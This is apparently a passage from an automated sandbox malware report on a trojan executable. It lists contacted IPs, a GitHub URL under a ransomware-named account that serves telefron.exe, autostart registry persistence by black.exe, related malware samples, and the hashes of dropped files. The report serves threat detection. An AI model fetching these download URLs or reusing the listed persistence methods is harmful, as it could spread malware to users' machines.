    		185.178.208.190
    		truetrueunknown
    x1.i.lencr.org
    		unknown
    		unknownfalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exefalse
        		high
        https://github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.23.drfalse
            		high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameblack.exe, 00000001.00000002.4147614822.0000000002521000.00000004.00000800.00020000.00000000.sdmp, black.exe, 00000007.00000002.4147454579.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://github.comblack.exe, 00000001.00000002.4147614822.0000000002521000.00000004.00000800.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                69.192.108.223
                		unknownUnited States
                		16625AKAMAI-ASUSfalse
                20.233.83.145
                		github.comUnited States
                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                185.178.208.190
                		vastgm.ruRussian Federation
                		57724DDOS-GUARDRUtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1571211
                Start date and time:2024-12-09 07:02:47 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 44s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:44
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Y5kEUsYDFr.exe
                renamed because original name is a hash value
                Original Sample Name:ec773998b0078cc58100fdb4d27dc3f4.exe
                Detection:MAL
                Classification:mal100.troj.adwa.evad.winEXE@42/41@3/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 206
                • Number of non-executed functions: 110
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 23.32.238.137, 23.32.238.128, 23.32.238.98, 23.32.238.106, 23.32.238.138, 23.32.238.113, 23.32.238.107, 23.32.238.123, 23.32.238.129, 162.159.61.3, 172.64.41.3, 23.32.238.155, 23.32.238.162, 2.19.198.49, 23.32.238.161, 23.32.238.131, 23.32.238.146, 2.19.198.43, 2.20.40.170, 23.218.208.137, 23.195.39.65, 50.16.47.176, 18.213.11.84, 34.237.241.83, 54.224.241.105, 23.32.238.122, 23.32.238.147, 23.32.238.153, 23.32.238.145, 23.32.238.115, 23.32.238.154, 2.16.188.171, 23.32.238.97, 23.32.238.112, 23.32.238.114, 23.32.238.99, 2.19.198.57, 2.19.198.41, 2.19.198.50, 2.19.198.58, 23.32.238.163, 2.19.198.40, 2.19.198.72, 23.32.238.160, 23.32.238.90, 23.32.238.96, 23.32.238.130, 2.19.198.73
                • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, crl.root-x1.letsencrypt.org.edgekey.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                01:04:16API Interceptor3912x Sleep call for process: black.exe modified
                01:05:11API Interceptor1x Sleep call for process: AcroCEF.exe modified
                06:03:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run black C:\Users\user\AppData\Roaming\black.exe
                06:03:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run black C:\Users\user\AppData\Roaming\black.exe
                06:04:18AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                69.192.108.223CMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                  Quarantined Messages.zipGet hashmaliciousUnknownBrowse
                    Quotation.xlsGet hashmaliciousUnknownBrowse
                      original (1).emlGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                        https://qcg-media.s3.amazonaws.com/media/uploads/560701/2023/09/20230928_651070_htmlCode18.pdfGet hashmaliciousUnknownBrowse
                          20.233.83.145qe4efGS22G.exeGet hashmaliciousUnknownBrowse
                            qe4efGS22G.exeGet hashmaliciousUnknownBrowse
                              QlyOUFGIFB.exeGet hashmaliciousMicroClipBrowse
                                https://github.com/bambulab/BambuStudio/releases/download/v01.10.01.50/Bambu_Studio_win_public-v01.10.01.50-20241115162711.exeGet hashmaliciousUnknownBrowse
                                  Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                    1.exeGet hashmaliciousHavoc, RUSTDESKBrowse
                                      Ttok18.exeGet hashmaliciousVidarBrowse
                                        https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exeGet hashmaliciousUnknownBrowse
                                          SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                            TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                              185.178.208.1909oUx9PzdSA.exeGet hashmaliciousCyberduck Djvu SmokeLoader VidarBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                github.comQlyOUFGIFB.exeGet hashmaliciousMicroClipBrowse
                                                • 20.233.83.146
                                                Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                • 20.233.83.145
                                                1.exeGet hashmaliciousHavoc, RUSTDESKBrowse
                                                • 20.233.83.145
                                                Ttok18.exeGet hashmaliciousVidarBrowse
                                                • 20.233.83.145
                                                https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exeGet hashmaliciousUnknownBrowse
                                                • 20.233.83.145
                                                SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                • 20.233.83.145
                                                PO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • 140.82.121.4
                                                TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                • 20.233.83.145
                                                TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                • 20.233.83.145
                                                TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                • 20.233.83.145

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                DDOS-GUARDRUhttps://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/YaL0IAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                http://cancelarpedidoaqui003.weebly.com/Get hashmaliciousUnknownBrowse
                                                • 195.216.243.218
                                                https://u.to/1czkIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/xjPiIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/G3PhIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/UKDgIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://sucursalvpinvalidar-aqui10.weebly.com/Get hashmaliciousUnknownBrowse
                                                • 195.216.243.218
                                                https://u.to/W9rXIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/SpzbIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                AKAMAI-ASUSsora.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 84.53.135.142
                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                • 104.84.160.234
                                                zZeXr4mg0S.exeGet hashmaliciousLokibotBrowse
                                                • 23.47.168.24
                                                meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 104.116.11.255
                                                meerkat.arm5.elfGet hashmaliciousMiraiBrowse
                                                • 95.101.212.58
                                                meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                • 104.119.28.3
                                                5386.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 23.195.92.153
                                                jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                • 23.50.229.212
                                                home.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 23.213.140.193
                                                jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 23.33.113.246
                                                MICROSOFT-CORP-MSN-AS-BLOCKUSTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                • 52.123.243.181
                                                6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                • 52.113.195.132
                                                Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                • 52.113.195.132
                                                jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 23.102.19.194
                                                jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                • 20.201.109.244
                                                jew.mips.elfGet hashmaliciousUnknownBrowse
                                                • 20.157.99.220
                                                jew.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 20.181.37.3
                                                jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 159.27.209.232
                                                jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 13.71.38.171

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                54328bd36c14bd82ddaa0c04b25ed9adHesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 20.233.83.145
                                                SIPARIS TEYIT FORMU VE PROFORMA FATURA.exeGet hashmaliciousMassLogger RATBrowse
                                                • 20.233.83.145
                                                INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 20.233.83.145
                                                BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                                                • 20.233.83.145
                                                INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 20.233.83.145
                                                Bank Swift and SOA PRN00720031415453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 20.233.83.145
                                                RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 20.233.83.145
                                                Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 20.233.83.145
                                                IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 20.233.83.145
                                                DEKONTU.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 20.233.83.145

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):289
                                                Entropy (8bit):5.158849390404121
                                                Encrypted:false
                                                SSDEEP:6:juRcq2Pwkn2nKuAl9OmbnIFUt8WuRfXZmw+WuRfFkwOwkn2nKuAl9OmbjLJ:ju+vYfHAahFUt8WupX/+WupF5JfHAaSJ
                                                MD5:24820C395FDB62B7FA224ADFFF0CD1A1
                                                SHA1:B68ED3162860A4385EBCDBD94E13E0B6924E1748
                                                SHA-256:2A71D9DC773CEDD2C42500CF91DB73DBDCB27A56263B39A1BE4BFAE3DD33CB72
                                                SHA-512:2DDD89849084CDD2B60DB27988974C51E848D9605AE45F762A293A24A20362B665103D59C110358A4931877D30EE6C5DC13BB76868E01ECB12F836538C629E80
                                                Malicious:false
                                                Preview:2024/12/09-01:04:43.117 cd4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/09-01:04:43.119 cd4 Recovering log #3.2024/12/09-01:04:43.119 cd4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):289
                                                Entropy (8bit):5.158849390404121
                                                Encrypted:false
                                                SSDEEP:6:juRcq2Pwkn2nKuAl9OmbnIFUt8WuRfXZmw+WuRfFkwOwkn2nKuAl9OmbjLJ:ju+vYfHAahFUt8WupX/+WupF5JfHAaSJ
                                                MD5:24820C395FDB62B7FA224ADFFF0CD1A1
                                                SHA1:B68ED3162860A4385EBCDBD94E13E0B6924E1748
                                                SHA-256:2A71D9DC773CEDD2C42500CF91DB73DBDCB27A56263B39A1BE4BFAE3DD33CB72
                                                SHA-512:2DDD89849084CDD2B60DB27988974C51E848D9605AE45F762A293A24A20362B665103D59C110358A4931877D30EE6C5DC13BB76868E01ECB12F836538C629E80
                                                Malicious:false
                                                Preview:2024/12/09-01:04:43.117 cd4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/09-01:04:43.119 cd4 Recovering log #3.2024/12/09-01:04:43.119 cd4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):333
                                                Entropy (8bit):5.163052101733533
                                                Encrypted:false
                                                SSDEEP:6:ju+q2Pwkn2nKuAl9Ombzo2jMGIFUt8WuJKXZmw+WuZFzkwOwkn2nKuAl9Ombzo23:ju+vYfHAa8uFUt8WuJ6/+Wun5JfHAa8z
                                                MD5:47F56480CBC018B56B319005ADAF033A
                                                SHA1:E3B3620E073FB4EED636EADDE4B886998AB13277
                                                SHA-256:5542A9B8BE4C4733440F71CE7EB23029663685BC353B263A5F6A83A87FCFE453
                                                SHA-512:E1FAA0BCEB6D79E22393F526642E94CF63B597CC93DB0E1FFCD542F63622CFD1ED8F29A8F69EEF5E2CA7A01B21BCE3424AD170F03BB0FA1D2EB6AF6A0AF0E4E4
                                                Malicious:false
                                                Preview:2024/12/09-01:04:43.801 6c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/09-01:04:43.802 6c4 Recovering log #3.2024/12/09-01:04:43.803 6c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):333
                                                Entropy (8bit):5.163052101733533
                                                Encrypted:false
                                                SSDEEP:6:ju+q2Pwkn2nKuAl9Ombzo2jMGIFUt8WuJKXZmw+WuZFzkwOwkn2nKuAl9Ombzo23:ju+vYfHAa8uFUt8WuJ6/+Wun5JfHAa8z
                                                MD5:47F56480CBC018B56B319005ADAF033A
                                                SHA1:E3B3620E073FB4EED636EADDE4B886998AB13277
                                                SHA-256:5542A9B8BE4C4733440F71CE7EB23029663685BC353B263A5F6A83A87FCFE453
                                                SHA-512:E1FAA0BCEB6D79E22393F526642E94CF63B597CC93DB0E1FFCD542F63622CFD1ED8F29A8F69EEF5E2CA7A01B21BCE3424AD170F03BB0FA1D2EB6AF6A0AF0E4E4
                                                Malicious:false
                                                Preview:2024/12/09-01:04:43.801 6c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/09-01:04:43.802 6c4 Recovering log #3.2024/12/09-01:04:43.803 6c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):475
                                                Entropy (8bit):4.967403857886107
                                                Encrypted:false
                                                SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                MD5:B7761633048D74E3C02F61AD04E00147
                                                SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                Malicious:false
                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF6d2e70.TMP (copy)

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):475
                                                Entropy (8bit):4.967403857886107
                                                Encrypted:false
                                                SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                MD5:B7761633048D74E3C02F61AD04E00147
                                                SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                Malicious:false
                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d1e8fdc2-5a27-4dd7-955d-2c2d0c2005af.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:modified
                                                Size (bytes):546
                                                Entropy (8bit):4.949867576032391
                                                Encrypted:false
                                                SSDEEP:12:YHgLdvI1oqBWsB6um3RA8sqJ2gsBd2caq3QH7E4TX:YALtIPB7JsRdsZdJ3QH7n7
                                                MD5:624EA1F42B72404E6A5BD12EA495EA67
                                                SHA1:F3C694F276938BF5C9830C4C1F0616E3404BDAED
                                                SHA-256:217F03962EB39AB353704367748A38B1B15B84CF4A8DA17685D98F9A0F0130EA
                                                SHA-512:C316787F369603F9260930B30E159FB8ADC19F60C1ABE24C8C2182C685A93BC540131B48D4F9C108E7886424B4373E75FC16B972607AC76AE7B2A17F02333E0E
                                                Malicious:false
                                                Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":2,"broken_until":"1733724610","host":"chrome.cloudflare-dns.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378284312710911","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\dcddf736-09ed-4644-94da-a6ed343af90a.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):475
                                                Entropy (8bit):4.967403857886107
                                                Encrypted:false
                                                SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                MD5:B7761633048D74E3C02F61AD04E00147
                                                SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                Malicious:false
                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4812
                                                Entropy (8bit):5.2607929979267825
                                                Encrypted:false
                                                SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo73c/c0YBjH:etJCV4FiN/jTN/2r8Mta02fEhgO73gov
                                                MD5:9E3947FA773E7A3D28AC26D823AC3597
                                                SHA1:BAC1FC7A5EAA23612FAF7DD13F2EA1544BBF1E3B
                                                SHA-256:01D2E2DCCF62A7EDD280D48C64749356D14D80F55CBDAE7581563F96D0F637D6
                                                SHA-512:D294A46BE16786E191B2C32F36FE2AAF4C6341518DB7157647650D33849925D2E5A81B4403EA0E1BA8F58F2A07A1F34386AF4B53347F119AF14D2D10BFFB1E49
                                                Malicious:false
                                                Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):321
                                                Entropy (8bit):5.151007476450527
                                                Encrypted:false
                                                SSDEEP:6:jOQeIq2Pwkn2nKuAl9OmbzNMxIFUt8WOKJZmw+WEGkwOwkn2nKuAl9OmbzNMFLJ:jNXvYfHAa8jFUt8WT/+WEG5JfHAa84J
                                                MD5:B9BF243A6C1458C4C0DDF30471ED1AC9
                                                SHA1:0734065638611C7E6E21115B17E9C7313F008926
                                                SHA-256:7EC7FD71BAC83B6EF1373FD4AFB7E3D7660E5468CB1F82A770E0AAD2DB08CDA9
                                                SHA-512:97C177F28AEAA1E058CB23557244FC60A4A3E0119B0124DE10247E8398AFD870DD732A7DE1126EB9459E78E7143A60CDD077F21695622A5DD8722646C3BB6250
                                                Malicious:false
                                                Preview:2024/12/09-01:04:44.295 6c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/09-01:04:44.296 6c4 Recovering log #3.2024/12/09-01:04:44.300 6c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):321
                                                Entropy (8bit):5.151007476450527
                                                Encrypted:false
                                                SSDEEP:6:jOQeIq2Pwkn2nKuAl9OmbzNMxIFUt8WOKJZmw+WEGkwOwkn2nKuAl9OmbzNMFLJ:jNXvYfHAa8jFUt8WT/+WEG5JfHAa84J
                                                MD5:B9BF243A6C1458C4C0DDF30471ED1AC9
                                                SHA1:0734065638611C7E6E21115B17E9C7313F008926
                                                SHA-256:7EC7FD71BAC83B6EF1373FD4AFB7E3D7660E5468CB1F82A770E0AAD2DB08CDA9
                                                SHA-512:97C177F28AEAA1E058CB23557244FC60A4A3E0119B0124DE10247E8398AFD870DD732A7DE1126EB9459E78E7143A60CDD077F21695622A5DD8722646C3BB6250
                                                Malicious:false
                                                Preview:2024/12/09-01:04:44.295 6c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/09-01:04:44.296 6c4 Recovering log #3.2024/12/09-01:04:44.300 6c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                Category:dropped
                                                Size (bytes):86016
                                                Entropy (8bit):4.444630649917991
                                                Encrypted:false
                                                SSDEEP:384:yezci5t7iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r4s3OazzU89UTTgUL
                                                MD5:D29FC24683F57AEE770CCC10BBE10145
                                                SHA1:FD39A81AEAF28A09C451AC4B5DAA737961E91208
                                                SHA-256:3CF860E12D12737619F91078019729DBE643094EFC1C76C287637B72D7FDEE23
                                                SHA-512:5C50ACDC4AB8FCB20D322E987048FDC66DE90CD62EDDDE804B31F3CEA12A41D9DDDC3E741EB825417049DAF76B03E5B7B3396206A61DFC62D3B237B0EBC1BC02
                                                Malicious:false
